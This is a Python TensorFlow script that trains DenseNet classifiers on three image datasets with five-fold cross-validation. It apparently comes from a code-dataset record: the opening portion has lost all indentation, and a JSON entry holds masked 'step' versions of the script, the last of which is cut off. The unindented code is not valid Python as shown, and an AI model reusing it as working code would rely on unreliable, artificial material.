print('number of layers in dense block : %d ' % num_layers)
print('growth rate(k_fm) : %d ' % k_fm)
print('filter size : %d ' % fs)
print('bottleneck : %d' % bottleneck)
print('dropout prob : %g ' % dropout_prob)
print('data_type :', data_type)
print('file_name :', file_name)
print('FC nodes : %d' % fc_nodes[0])
epoch_around = (itrt_index * batch_size) / total_trainImages
print('Number of epochs : %f ' % epoch_around)
# plot the cost
plt.plot(np.squeeze(costs))
plt.ylabel('cost')
plt.xlabel('iterations (per tens)')
plt.title("Learning rate =" + str(learn_rate))
plt.show()
if i % 100 == 0:
train_accuracy = accuracy.eval(feed_dict={
x: batch[0], y_: batch[1],
keep_prob: 1.0, training:False})
print('step %d, training accuracy %g' % (i, train_accuracy))
_, loss = sess.run([train_step, cross_entropy],
feed_dict={x: batch[0], y_: batch[1],
keep_prob: dropout_prob, training:True})
iteration_cost = 0 # Defines a cost related to an epoch
num_minibatches = int(total_trainImages / batch_size) # number of minibatches of size minibatch_size in the train set
iteration_cost += loss / num_minibatches
costs.append(iteration_cost)
if i % 100 == 0:
print ('Loss: ',loss)
Accuracy = 0
training_time = time.time() - start_time
print('Training Time: %f secs' % training_time)
if Dataset == '1':
if file_name == '5th_fold':
num_test = 13154
else:
num_test = 13155
elif Dataset == '2':
num_test = 503
elif Dataset == '3':
num_test = 400
print(num_test)
for img_index in range(num_test):
t_image = np.array(Test_Images[img_index,:]).reshape(1,784)
t_label = np.array(Test_Labels[img_index,:]).reshape(1,number_of_classes)
test_acc = accuracy.eval(feed_dict={
x: t_image, y_: t_label,
keep_prob: 1.0, training:False})
Accuracy += test_acc
wrong, predicted = sess.run([wrong_prediction_printop, predicted_labels_printop], feed_dict={
x: t_image, y_: t_label,
keep_prob: 1.0, training:False})
if img_index <= 3:
b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = sess.run([b1_conv_printop, b2_conv_printop, b3_conv_printop,
t1_conv_printop,t2_conv_printop, t3_conv_printop, t1_b_conv_printop, t2_b_conv_printop, t3_b_conv_printop],
feed_dict={
x: t_image, y_: t_label,
keep_prob: 1.0, training:False})
if img_index == 0:
b1_list = b1
b2_list = b2
b3_list = b3
t1_list = t1
t2_list = t2
t3_list = t3
t1_b_list = t1_b
t2_b_list = t2_b
t3_b_list = t3_b
else:
b1_list = np.append(b1_list,b1,axis=0)
b2_list = np.append(b2_list,b2,axis=0)
b3_list = np.append(b3_list,b3,axis=0)
t1_list = np.append(t1_list,t1,axis=0)
t2_list = np.append(t2_list,t2,axis=0)
t3_list = np.append(t3_list,t3,axis=0)
t1_b_list = np.append(t1_b_list,t1_b,axis=0)
t2_b_list = np.append(t2_b_list,t2_b,axis=0)
t3_b_list = np.append(t3_b_list,t3_b,axis=0)
if img_index == 0 :
wrong_list = wrong
predicted_list = predicted
else:
wrong_list = np.append(wrong_list,wrong,axis=0)
predicted_list = np.append(predicted_list,predicted,axis=0)
Accuracy = Accuracy/num_test
print('Average test accuracy: %g' % Accuracy)
accuracy_list.append(Accuracy)
list_of_predicted_list.append(predicted_list)
elapsed_time = time.time() - start_time
print('Elapsed Time: %f secs' % elapsed_time)
print('Batch Size & Iteration & Total Train Imgs : %d & %d & %d' % (batch_size, itrt_index, total_trainImages))
print('learning_rate : %g ' % learn_rate)
print('1st conv FMaps : %d ' % fm1)
print('number of layers in dense block : %d ' % num_layers)
print('growth rate(k_fm) : %d ' % k_fm)
print('filter size : %d ' % fs)
print('bottleneck : %d' % bottleneck)
print('dropout prob : %g ' % dropout_prob)
print('data_type :', data_type)
print('file_name :', file_name)
print('FC nodes : %d' % fc_nodes[0])
epoch_around = math.ceil((iteration * batch_size) / total_trainImages)
if epoch_around == 51:
epoch_around = 50
print('Number of epochs : %f ' % epoch_around)
# plot the cost
plt.plot(np.squeeze(costs))
plt.ylabel('cost')
plt.xlabel('iterations (per tens)')
plt.title("Learning rate =" + str(learn_rate))
plt.show()
sio.savemat('D'+Dataset+'_'+file_name+'_'+str(epoch_around)+'ep_'+data_type+'_predicted_labels_list.mat', {'wrong_list':wrong_list, 'predicted_list': predicted_list, 'Target_labels':Target_labels, 'accuracy_list':accuracy_list, 'list_of_predicted_list':list_of_predicted_list, 'costs':costs, 'b1_list':b1_list, 'b2_list':b2_list, 'b3_list':b3_list, 't1_list':t1_list,
't2_list':t2_list, 't3_list':t3_list, 't1_b_list':t1_b_list, 't2_b_list':t2_b_list, 't3_b_list':t3_b_list})
class MyModel:
num_layers = 4
k_fm = 24
fs = 3
fm1 = 32
bottleneck = 4
dropout_prob = 0.8
batch_size = [16]
learn_rate = 0.001
num_of_test = 40
model = MyModel()
densenet('1','org',1,model)
densenet('1','org',2,model)
densenet('1','org',3,model)
densenet('1','org',4,model)
densenet('1','org',5,model)
densenet('1','aug',1,model)
densenet('1','aug',2,model)
densenet('1','aug',3,model)
densenet('1','aug',4,model)
densenet('1','aug',5,model)
densenet('2','org',1,model)
densenet('2','org',2,model)
densenet('2','org',3,model)
densenet('2','org',4,model)
densenet('2','org',5,model)
densenet('2','aug',1,model)
densenet('2','aug',2,model)
densenet('2','aug',3,model)
densenet('2','aug',4,model)
densenet('2','aug',5,model)
densenet('3','org',1,model)
densenet('3','org',2,model)
densenet('3','org',3,model)
densenet('3','org',4,model)
densenet('3','org',5,model)
densenet('3','aug',1,model)
densenet('3','aug',2,model)
densenet('3','aug',3,model)
densenet('3','aug',4,model)
densenet('3','aug',5,model)
|
normal
|
{
"blob_id": "48270f70a9d69d15f808f22ec2d11d337b2c4845",
"index": 7414,
"step-1": "<mask token>\n\n\nclass MyModel:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass MyModel:\n num_layers = 4\n k_fm = 24\n fs = 3\n fm1 = 32\n bottleneck = 4\n dropout_prob = 0.8\n batch_size = [16]\n learn_rate = 0.001\n num_of_test = 40\n\n\n<mask token>\n",
"step-3": "def densenet(D, DT, F, model):\n import scipy.io as sio\n import time\n import os\n import math\n import numpy as np\n import matplotlib.pyplot as plt\n Dataset = D\n if DT == 'org':\n data_type = 'original'\n else:\n data_type = 'augmented'\n fs = model.fs\n fm1 = model.fm1\n batch_size = model.batch_size[0]\n learn_rate = model.learn_rate\n num_layers = model.num_layers\n k_fm = model.k_fm\n bottleneck = model.bottleneck\n dropout_prob = model.dropout_prob\n num_of_test = model.num_of_test\n if F == 1:\n file_name = '1st_fold'\n elif F == 2:\n file_name = '2nd_fold'\n elif F == 3:\n file_name = '3rd_fold'\n elif F == 4:\n file_name = '4th_fold'\n elif F == 5:\n file_name = '5th_fold'\n path = os.path.join('CrossVal', 'D' + Dataset)\n print('path ', path)\n if data_type == 'original':\n Train = sio.loadmat(os.path.join(path, 'D' + Dataset + '_' +\n file_name + '_train.mat'))\n else:\n Train = sio.loadmat(os.path.join(path, 'Augmented_D' + Dataset +\n '_' + file_name + '_train.mat'))\n Test = sio.loadmat(os.path.join(path, 'D' + Dataset + '_' + file_name +\n '_test.mat'))\n if Dataset == '1':\n number_of_classes = 24\n num_of_ep = 50\n num_of_test = 20\n if data_type == 'augmented':\n train_imgs = 526190\n else:\n train_imgs = 52619\n iteration = math.ceil(num_of_ep * train_imgs / batch_size)\n elif Dataset == '2':\n number_of_classes = 36\n num_of_ep = 200\n if data_type == 'augmented':\n train_imgs = 20120\n else:\n train_imgs = 2012\n iteration = math.ceil(num_of_ep * train_imgs / batch_size)\n else:\n number_of_classes = 10\n num_of_ep = 200\n if data_type == 'augmented':\n train_imgs = 16000\n else:\n train_imgs = 1600\n iteration = math.ceil(num_of_ep * train_imgs / batch_size)\n iteration_to_display = int(iteration / num_of_test)\n list_to_display = []\n for i in range(num_of_test):\n if i != num_of_test:\n list_to_display.append(int(iteration_to_display * (i + 1)))\n del i\n total_fm_Block_1 = fm1 + num_layers * k_fm\n total_fm_Block_2 = total_fm_Block_1 + num_layers * k_fm\n total_fm_Block_3 = total_fm_Block_2 + num_layers * k_fm\n fc_nodes = [total_fm_Block_3]\n Train_Images = Train['trainImages']\n Train_Labels = Train['trainLabels2']\n total_trainImages = len(Train_Images[0, 2])\n print(total_trainImages)\n Train_Images = Train_Images.reshape(784, total_trainImages).transpose(\n ).astype('float32')\n Train_Labels = Train_Labels.transpose().astype('float64')\n Test_Images = Test['testImages']\n Test_Labels = Test['testLabels2']\n total_testImages = len(Test_Images[0, 2])\n Test_Images = Test_Images.reshape(784, total_testImages).transpose(\n ).astype('float32')\n Test_Labels = Test_Labels.transpose().astype('float64')\n Target_labels = np.argmax(Test_Labels, axis=1)\n del Test\n del Train\n import tensorflow as tf\n tf.reset_default_graph()\n g = tf.Graph()\n with g.as_default():\n tf.set_random_seed(1)\n\n def weight_variable(shape, n):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial, name=n)\n\n def bias_variable(shape, n):\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial, name=n)\n\n def avg_pool(input, s):\n return tf.nn.avg_pool(input, [1, s, s, 1], [1, s, s, 1], 'SAME')\n\n def max_pool(input, s):\n return tf.nn.max_pool(input, [1, s, s, 1], [1, s, s, 1], 'SAME')\n\n def conv2d_1(input, in_features, out_features, kernel_size, name=\n 'W', with_bias=False):\n W = weight_variable([kernel_size, kernel_size, in_features,\n out_features], name)\n conv = tf.nn.conv2d(input, W, [1, 1, 1, 1], padding='SAME')\n if 
with_bias:\n return conv + bias_variable([out_features])\n return conv\n\n def batch_activ_conv(current, in_features, out_features,\n kernel_size, is_training, keep_prob, idx, scope='conv_block'):\n with tf.variable_scope(scope):\n current = tf.layers.batch_normalization(current, scale=True,\n training=is_training)\n current = tf.nn.relu(current)\n current = conv2d_1(current, in_features, out_features,\n kernel_size, name='W' + str(idx))\n current = tf.nn.dropout(current, keep_prob)\n return current\n\n def block(input, layers, in_features, growth, is_training,\n keep_prob, name='Block_'):\n with tf.name_scope(name):\n with tf.variable_scope(name):\n current = input\n features = in_features\n for idx in range(layers):\n tmp = batch_activ_conv(current, features, growth,\n fs, is_training, keep_prob, idx + 1, scope=\n 'conv_block_' + str(idx + 1))\n current = tf.concat((current, tmp), axis=3)\n features += growth\n return current, features\n x = tf.placeholder(tf.float32, shape=[None, 784])\n y_ = tf.placeholder(tf.float32, shape=[None, number_of_classes])\n x_image = tf.reshape(x, [-1, 28, 28, 1])\n keep_prob = tf.placeholder(tf.float32)\n training = tf.placeholder(tf.bool)\n current = conv2d_1(x_image, 1, fm1, fs, name='W1', with_bias=False)\n current, features = block(current, num_layers, fm1, k_fm, training,\n keep_prob, name='Block_1')\n b1_conv_printop = tf.Print(current, [current])\n with tf.name_scope('transition_lyr'):\n current = batch_activ_conv(current, features, bottleneck * k_fm,\n 1, training, keep_prob, 1, scope='Transition_layer_1')\n t1_b_conv_printop = tf.Print(current, [current])\n current = batch_activ_conv(current, bottleneck * k_fm, features,\n fs, training, keep_prob, 1, scope='Transition_layer_1_1')\n t1_conv_printop = tf.Print(current, [current])\n current = max_pool(current, 2)\n current, features = block(current, num_layers, features, k_fm,\n training, keep_prob, name='Block_2')\n b2_conv_printop = tf.Print(current, [current])\n with tf.name_scope('transition_lyr_2'):\n current = batch_activ_conv(current, features, bottleneck * k_fm,\n 1, training, keep_prob, 1, scope='Transition_layer_2')\n t2_b_conv_printop = tf.Print(current, [current])\n current = batch_activ_conv(current, bottleneck * k_fm, features,\n fs, training, keep_prob, 1, scope='Transition_layer_2_1')\n t2_conv_printop = tf.Print(current, [current])\n current = max_pool(current, 2)\n current, features = block(current, num_layers, features, k_fm,\n training, keep_prob, name='Block_3')\n b3_conv_printop = tf.Print(current, [current])\n with tf.name_scope('transition_lyr_3'):\n current = batch_activ_conv(current, features, bottleneck * k_fm,\n 1, training, keep_prob, 1, scope='Transition_layer_3')\n t3_b_conv_printop = tf.Print(current, [current])\n current = batch_activ_conv(current, bottleneck * k_fm, features,\n fs, training, keep_prob, 1, scope='Transition_layer_3_1')\n t3_conv_printop = tf.Print(current, [current])\n current = avg_pool(current, 7)\n current = tf.reshape(current, [tf.shape(current)[0], -1])\n with tf.name_scope('Dense_Last_lyr'):\n W_fc3 = weight_variable([fc_nodes[0], number_of_classes], 'w_fc3')\n b_fc3 = bias_variable([number_of_classes], 'b_fc3')\n y_conv = tf.matmul(current, W_fc3) + b_fc3\n prediction_prob = tf.nn.softmax(y_conv)\n prediction_prob_printop = tf.Print(prediction_prob, [\n prediction_prob])\n with tf.name_scope('Xent'):\n cross_entropy = tf.reduce_mean(tf.nn.\n softmax_cross_entropy_with_logits(labels=y_, logits=y_conv))\n with tf.name_scope('train'):\n 
extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(extra_update_ops):\n train_step = tf.train.AdamOptimizer(learn_rate).minimize(\n cross_entropy)\n with tf.name_scope('accuracy'):\n correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(\n y_, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n wrong_prediction = tf.not_equal(tf.argmax(y_conv, 1), tf.argmax\n (y_, 1))\n wrong_prediction_printop = tf.Print(wrong_prediction, [\n wrong_prediction])\n predicted_labels = tf.argmax(y_conv, 1)\n predicted_labels_printop = tf.Print(predicted_labels, [\n predicted_labels])\n index = 0\n index_end = index + batch_size\n remaining = 0\n start_time = time.time()\n costs = []\n accuracy_list = []\n list_of_predicted_list = []\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer(), tf.set_random_seed(0))\n for i in range(iteration):\n if index_end > total_trainImages:\n remaining = total_trainImages - (index_end - batch_size)\n images = Train_Images[index_end - batch_size:\n total_trainImages, :]\n labels = Train_Labels[index_end - batch_size:\n total_trainImages, :]\n index = 0\n index_end = index + batch_size - remaining\n images = np.vstack((images, Train_Images[index:\n index_end, :]))\n labels = np.vstack((labels, Train_Labels[index:\n index_end, :]))\n batch = images, labels\n index = index_end\n index_end = index + batch_size\n else:\n batch = Train_Images[index:index_end, :], Train_Labels[\n index:index_end, :]\n index = index + batch_size\n index_end = index_end + batch_size\n if i in list_to_display:\n elapsed_time = time.time() - start_time\n print('Elapsed Time Before for loop: %f secs' %\n elapsed_time)\n Accuracy = 0\n itrt_index = i\n print('debug: %d & %d' % (iteration, i))\n if Dataset == '1':\n if file_name == '5th_fold':\n num_test = 13154\n else:\n num_test = 13155\n elif Dataset == '2':\n num_test = 503\n elif Dataset == '3':\n num_test = 400\n print(num_test)\n for img_index in range(num_test):\n t_image = np.array(Test_Images[img_index, :]).reshape(\n 1, 784)\n t_label = np.array(Test_Labels[img_index, :]).reshape(\n 1, number_of_classes)\n test_acc = accuracy.eval(feed_dict={x: t_image, y_:\n t_label, keep_prob: 1.0, training: False})\n Accuracy += test_acc\n wrong, predicted, prediction_prob = sess.run([\n wrong_prediction_printop,\n predicted_labels_printop,\n prediction_prob_printop], feed_dict={x: t_image,\n y_: t_label, keep_prob: 1.0, training: False})\n if img_index <= 3:\n b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = (sess\n .run([b1_conv_printop, b2_conv_printop,\n b3_conv_printop, t1_conv_printop,\n t2_conv_printop, t3_conv_printop,\n t1_b_conv_printop, t2_b_conv_printop,\n t3_b_conv_printop], feed_dict={x: t_image,\n y_: t_label, keep_prob: 1.0, training: False}))\n if img_index == 0:\n b1_list = b1\n b2_list = b2\n b3_list = b3\n t1_list = t1\n t2_list = t2\n t3_list = t3\n t1_b_list = t1_b\n t2_b_list = t2_b\n t3_b_list = t3_b\n else:\n b1_list = np.append(b1_list, b1, axis=0)\n b2_list = np.append(b2_list, b2, axis=0)\n b3_list = np.append(b3_list, b3, axis=0)\n t1_list = np.append(t1_list, t1, axis=0)\n t2_list = np.append(t2_list, t2, axis=0)\n t3_list = np.append(t3_list, t3, axis=0)\n t1_b_list = np.append(t1_b_list, t1_b, axis=0)\n t2_b_list = np.append(t2_b_list, t2_b, axis=0)\n t3_b_list = np.append(t3_b_list, t3_b, axis=0)\n if img_index == 0:\n wrong_list_1 = wrong\n predicted_list_1 = predicted\n prediction_prob_1 = prediction_prob\n else:\n wrong_list_1 = 
np.append(wrong_list_1, wrong,\n axis=0)\n predicted_list_1 = np.append(predicted_list_1,\n predicted, axis=0)\n prediction_prob_1 = np.append(prediction_prob_1,\n prediction_prob)\n Accuracy = Accuracy / num_test\n accuracy_list.append(Accuracy)\n list_of_predicted_list.append(predicted_list_1)\n print('Average test accuracy: %g' % Accuracy)\n epoch_around = math.ceil(itrt_index * batch_size /\n total_trainImages)\n sio.savemat('D' + Dataset + '_' + file_name + '_' + str\n (epoch_around) + 'ep_' + data_type +\n '_predicted_labels_list.mat', {'wrong_list':\n wrong_list_1, 'predicted_list': predicted_list_1,\n 'Target_labels': Target_labels, 'prediction_prob':\n prediction_prob, 'b1_list': b1_list, 'b2_list':\n b2_list, 'b3_list': b3_list, 't1_list': t1_list,\n 't2_list': t2_list, 't3_list': t3_list, 't1_b_list':\n t1_b_list, 't2_b_list': t2_b_list, 't3_b_list':\n t3_b_list})\n elapsed_time = time.time() - start_time\n print('Elapsed Time: %f secs' % elapsed_time)\n print(\n 'Batch Size & Iteration & Total Train Imgs : %d & %d & %d'\n % (batch_size, itrt_index, total_trainImages))\n print('learning_rate : %g ' % learn_rate)\n print('1st conv FMaps : %d ' % fm1)\n print('number of layers in dense block : %d ' % num_layers)\n print('growth rate(k_fm) : %d ' % k_fm)\n print('filter size : %d ' % fs)\n print('bottleneck : %d' % bottleneck)\n print('dropout prob : %g ' % dropout_prob)\n print('data_type :', data_type)\n print('file_name :', file_name)\n print('FC nodes : %d' % fc_nodes[0])\n epoch_around = itrt_index * batch_size / total_trainImages\n print('Number of epochs : %f ' % epoch_around)\n plt.plot(np.squeeze(costs))\n plt.ylabel('cost')\n plt.xlabel('iterations (per tens)')\n plt.title('Learning rate =' + str(learn_rate))\n plt.show()\n if i % 100 == 0:\n train_accuracy = accuracy.eval(feed_dict={x: batch[0],\n y_: batch[1], keep_prob: 1.0, training: False})\n print('step %d, training accuracy %g' % (i, train_accuracy)\n )\n _, loss = sess.run([train_step, cross_entropy], feed_dict={\n x: batch[0], y_: batch[1], keep_prob: dropout_prob,\n training: True})\n iteration_cost = 0\n num_minibatches = int(total_trainImages / batch_size)\n iteration_cost += loss / num_minibatches\n costs.append(iteration_cost)\n if i % 100 == 0:\n print('Loss: ', loss)\n Accuracy = 0\n training_time = time.time() - start_time\n print('Training Time: %f secs' % training_time)\n if Dataset == '1':\n if file_name == '5th_fold':\n num_test = 13154\n else:\n num_test = 13155\n elif Dataset == '2':\n num_test = 503\n elif Dataset == '3':\n num_test = 400\n print(num_test)\n for img_index in range(num_test):\n t_image = np.array(Test_Images[img_index, :]).reshape(1, 784)\n t_label = np.array(Test_Labels[img_index, :]).reshape(1,\n number_of_classes)\n test_acc = accuracy.eval(feed_dict={x: t_image, y_: t_label,\n keep_prob: 1.0, training: False})\n Accuracy += test_acc\n wrong, predicted = sess.run([wrong_prediction_printop,\n predicted_labels_printop], feed_dict={x: t_image, y_:\n t_label, keep_prob: 1.0, training: False})\n if img_index <= 3:\n b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = sess.run([\n b1_conv_printop, b2_conv_printop, b3_conv_printop,\n t1_conv_printop, t2_conv_printop, t3_conv_printop,\n t1_b_conv_printop, t2_b_conv_printop,\n t3_b_conv_printop], feed_dict={x: t_image, y_:\n t_label, keep_prob: 1.0, training: False})\n if img_index == 0:\n b1_list = b1\n b2_list = b2\n b3_list = b3\n t1_list = t1\n t2_list = t2\n t3_list = t3\n t1_b_list = t1_b\n t2_b_list = t2_b\n t3_b_list = t3_b\n else:\n 
b1_list = np.append(b1_list, b1, axis=0)\n b2_list = np.append(b2_list, b2, axis=0)\n b3_list = np.append(b3_list, b3, axis=0)\n t1_list = np.append(t1_list, t1, axis=0)\n t2_list = np.append(t2_list, t2, axis=0)\n t3_list = np.append(t3_list, t3, axis=0)\n t1_b_list = np.append(t1_b_list, t1_b, axis=0)\n t2_b_list = np.append(t2_b_list, t2_b, axis=0)\n t3_b_list = np.append(t3_b_list, t3_b, axis=0)\n if img_index == 0:\n wrong_list = wrong\n predicted_list = predicted\n else:\n wrong_list = np.append(wrong_list, wrong, axis=0)\n predicted_list = np.append(predicted_list, predicted,\n axis=0)\n Accuracy = Accuracy / num_test\n print('Average test accuracy: %g' % Accuracy)\n accuracy_list.append(Accuracy)\n list_of_predicted_list.append(predicted_list)\n elapsed_time = time.time() - start_time\n print('Elapsed Time: %f secs' % elapsed_time)\n print(\n 'Batch Size & Iteration & Total Train Imgs : %d & %d & %d' %\n (batch_size, itrt_index, total_trainImages))\n print('learning_rate : %g ' % learn_rate)\n print('1st conv FMaps : %d ' % fm1)\n print('number of layers in dense block : %d ' % num_layers)\n print('growth rate(k_fm) : %d ' % k_fm)\n print('filter size : %d ' % fs)\n print('bottleneck : %d' % bottleneck)\n print('dropout prob : %g ' % dropout_prob)\n print('data_type :', data_type)\n print('file_name :', file_name)\n print('FC nodes : %d' % fc_nodes[0])\n epoch_around = math.ceil(iteration * batch_size / total_trainImages\n )\n if epoch_around == 51:\n epoch_around = 50\n print('Number of epochs : %f ' % epoch_around)\n plt.plot(np.squeeze(costs))\n plt.ylabel('cost')\n plt.xlabel('iterations (per tens)')\n plt.title('Learning rate =' + str(learn_rate))\n plt.show()\n sio.savemat('D' + Dataset + '_' + file_name + '_' + str(\n epoch_around) + 'ep_' + data_type +\n '_predicted_labels_list.mat', {'wrong_list': wrong_list,\n 'predicted_list': predicted_list, 'Target_labels':\n Target_labels, 'accuracy_list': accuracy_list,\n 'list_of_predicted_list': list_of_predicted_list, 'costs':\n costs, 'b1_list': b1_list, 'b2_list': b2_list, 'b3_list':\n b3_list, 't1_list': t1_list, 't2_list': t2_list, 't3_list':\n t3_list, 't1_b_list': t1_b_list, 't2_b_list': t2_b_list,\n 't3_b_list': t3_b_list})\n\n\nclass MyModel:\n num_layers = 4\n k_fm = 24\n fs = 3\n fm1 = 32\n bottleneck = 4\n dropout_prob = 0.8\n batch_size = [16]\n learn_rate = 0.001\n num_of_test = 40\n\n\n<mask token>\n",
"step-4": "def densenet(D, DT, F, model):\n import scipy.io as sio\n import time\n import os\n import math\n import numpy as np\n import matplotlib.pyplot as plt\n Dataset = D\n if DT == 'org':\n data_type = 'original'\n else:\n data_type = 'augmented'\n fs = model.fs\n fm1 = model.fm1\n batch_size = model.batch_size[0]\n learn_rate = model.learn_rate\n num_layers = model.num_layers\n k_fm = model.k_fm\n bottleneck = model.bottleneck\n dropout_prob = model.dropout_prob\n num_of_test = model.num_of_test\n if F == 1:\n file_name = '1st_fold'\n elif F == 2:\n file_name = '2nd_fold'\n elif F == 3:\n file_name = '3rd_fold'\n elif F == 4:\n file_name = '4th_fold'\n elif F == 5:\n file_name = '5th_fold'\n path = os.path.join('CrossVal', 'D' + Dataset)\n print('path ', path)\n if data_type == 'original':\n Train = sio.loadmat(os.path.join(path, 'D' + Dataset + '_' +\n file_name + '_train.mat'))\n else:\n Train = sio.loadmat(os.path.join(path, 'Augmented_D' + Dataset +\n '_' + file_name + '_train.mat'))\n Test = sio.loadmat(os.path.join(path, 'D' + Dataset + '_' + file_name +\n '_test.mat'))\n if Dataset == '1':\n number_of_classes = 24\n num_of_ep = 50\n num_of_test = 20\n if data_type == 'augmented':\n train_imgs = 526190\n else:\n train_imgs = 52619\n iteration = math.ceil(num_of_ep * train_imgs / batch_size)\n elif Dataset == '2':\n number_of_classes = 36\n num_of_ep = 200\n if data_type == 'augmented':\n train_imgs = 20120\n else:\n train_imgs = 2012\n iteration = math.ceil(num_of_ep * train_imgs / batch_size)\n else:\n number_of_classes = 10\n num_of_ep = 200\n if data_type == 'augmented':\n train_imgs = 16000\n else:\n train_imgs = 1600\n iteration = math.ceil(num_of_ep * train_imgs / batch_size)\n iteration_to_display = int(iteration / num_of_test)\n list_to_display = []\n for i in range(num_of_test):\n if i != num_of_test:\n list_to_display.append(int(iteration_to_display * (i + 1)))\n del i\n total_fm_Block_1 = fm1 + num_layers * k_fm\n total_fm_Block_2 = total_fm_Block_1 + num_layers * k_fm\n total_fm_Block_3 = total_fm_Block_2 + num_layers * k_fm\n fc_nodes = [total_fm_Block_3]\n Train_Images = Train['trainImages']\n Train_Labels = Train['trainLabels2']\n total_trainImages = len(Train_Images[0, 2])\n print(total_trainImages)\n Train_Images = Train_Images.reshape(784, total_trainImages).transpose(\n ).astype('float32')\n Train_Labels = Train_Labels.transpose().astype('float64')\n Test_Images = Test['testImages']\n Test_Labels = Test['testLabels2']\n total_testImages = len(Test_Images[0, 2])\n Test_Images = Test_Images.reshape(784, total_testImages).transpose(\n ).astype('float32')\n Test_Labels = Test_Labels.transpose().astype('float64')\n Target_labels = np.argmax(Test_Labels, axis=1)\n del Test\n del Train\n import tensorflow as tf\n tf.reset_default_graph()\n g = tf.Graph()\n with g.as_default():\n tf.set_random_seed(1)\n\n def weight_variable(shape, n):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial, name=n)\n\n def bias_variable(shape, n):\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial, name=n)\n\n def avg_pool(input, s):\n return tf.nn.avg_pool(input, [1, s, s, 1], [1, s, s, 1], 'SAME')\n\n def max_pool(input, s):\n return tf.nn.max_pool(input, [1, s, s, 1], [1, s, s, 1], 'SAME')\n\n def conv2d_1(input, in_features, out_features, kernel_size, name=\n 'W', with_bias=False):\n W = weight_variable([kernel_size, kernel_size, in_features,\n out_features], name)\n conv = tf.nn.conv2d(input, W, [1, 1, 1, 1], padding='SAME')\n if 
with_bias:\n return conv + bias_variable([out_features])\n return conv\n\n def batch_activ_conv(current, in_features, out_features,\n kernel_size, is_training, keep_prob, idx, scope='conv_block'):\n with tf.variable_scope(scope):\n current = tf.layers.batch_normalization(current, scale=True,\n training=is_training)\n current = tf.nn.relu(current)\n current = conv2d_1(current, in_features, out_features,\n kernel_size, name='W' + str(idx))\n current = tf.nn.dropout(current, keep_prob)\n return current\n\n def block(input, layers, in_features, growth, is_training,\n keep_prob, name='Block_'):\n with tf.name_scope(name):\n with tf.variable_scope(name):\n current = input\n features = in_features\n for idx in range(layers):\n tmp = batch_activ_conv(current, features, growth,\n fs, is_training, keep_prob, idx + 1, scope=\n 'conv_block_' + str(idx + 1))\n current = tf.concat((current, tmp), axis=3)\n features += growth\n return current, features\n x = tf.placeholder(tf.float32, shape=[None, 784])\n y_ = tf.placeholder(tf.float32, shape=[None, number_of_classes])\n x_image = tf.reshape(x, [-1, 28, 28, 1])\n keep_prob = tf.placeholder(tf.float32)\n training = tf.placeholder(tf.bool)\n current = conv2d_1(x_image, 1, fm1, fs, name='W1', with_bias=False)\n current, features = block(current, num_layers, fm1, k_fm, training,\n keep_prob, name='Block_1')\n b1_conv_printop = tf.Print(current, [current])\n with tf.name_scope('transition_lyr'):\n current = batch_activ_conv(current, features, bottleneck * k_fm,\n 1, training, keep_prob, 1, scope='Transition_layer_1')\n t1_b_conv_printop = tf.Print(current, [current])\n current = batch_activ_conv(current, bottleneck * k_fm, features,\n fs, training, keep_prob, 1, scope='Transition_layer_1_1')\n t1_conv_printop = tf.Print(current, [current])\n current = max_pool(current, 2)\n current, features = block(current, num_layers, features, k_fm,\n training, keep_prob, name='Block_2')\n b2_conv_printop = tf.Print(current, [current])\n with tf.name_scope('transition_lyr_2'):\n current = batch_activ_conv(current, features, bottleneck * k_fm,\n 1, training, keep_prob, 1, scope='Transition_layer_2')\n t2_b_conv_printop = tf.Print(current, [current])\n current = batch_activ_conv(current, bottleneck * k_fm, features,\n fs, training, keep_prob, 1, scope='Transition_layer_2_1')\n t2_conv_printop = tf.Print(current, [current])\n current = max_pool(current, 2)\n current, features = block(current, num_layers, features, k_fm,\n training, keep_prob, name='Block_3')\n b3_conv_printop = tf.Print(current, [current])\n with tf.name_scope('transition_lyr_3'):\n current = batch_activ_conv(current, features, bottleneck * k_fm,\n 1, training, keep_prob, 1, scope='Transition_layer_3')\n t3_b_conv_printop = tf.Print(current, [current])\n current = batch_activ_conv(current, bottleneck * k_fm, features,\n fs, training, keep_prob, 1, scope='Transition_layer_3_1')\n t3_conv_printop = tf.Print(current, [current])\n current = avg_pool(current, 7)\n current = tf.reshape(current, [tf.shape(current)[0], -1])\n with tf.name_scope('Dense_Last_lyr'):\n W_fc3 = weight_variable([fc_nodes[0], number_of_classes], 'w_fc3')\n b_fc3 = bias_variable([number_of_classes], 'b_fc3')\n y_conv = tf.matmul(current, W_fc3) + b_fc3\n prediction_prob = tf.nn.softmax(y_conv)\n prediction_prob_printop = tf.Print(prediction_prob, [\n prediction_prob])\n with tf.name_scope('Xent'):\n cross_entropy = tf.reduce_mean(tf.nn.\n softmax_cross_entropy_with_logits(labels=y_, logits=y_conv))\n with tf.name_scope('train'):\n 
